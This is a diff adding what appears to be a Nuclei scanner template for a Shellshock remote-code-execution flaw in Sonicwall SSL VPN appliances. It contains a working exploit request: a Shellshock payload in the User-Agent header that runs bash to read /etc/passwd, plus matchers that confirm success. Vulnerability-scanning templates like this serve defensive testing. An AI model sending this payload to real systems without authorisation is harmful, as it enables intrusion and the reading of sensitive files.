New Sonicwall 0day Exploit test

vulnerabilities/other/sonicwall-sslvpn-shellshock.yml

@@ -0,0 +1,28 @@
+id: sonicwall-sslvpn-shellshock
+
+info:
+  name: Sonicwall SSLVPN ShellShock RCE
+  author: PR3R00T
+  severity: critical
+
+  # Reference:-
+  # https://twitter.com/chybeta/status/1353974652540882944/photo/1
+
+requests:
+    raw:
+      - |
+        GET /cgi-bin/jarrewrite.sh HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
+        Accept: */*
+        Accept-Language: en
+        Connection: close
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+      - type: status
+        status:
+          - 200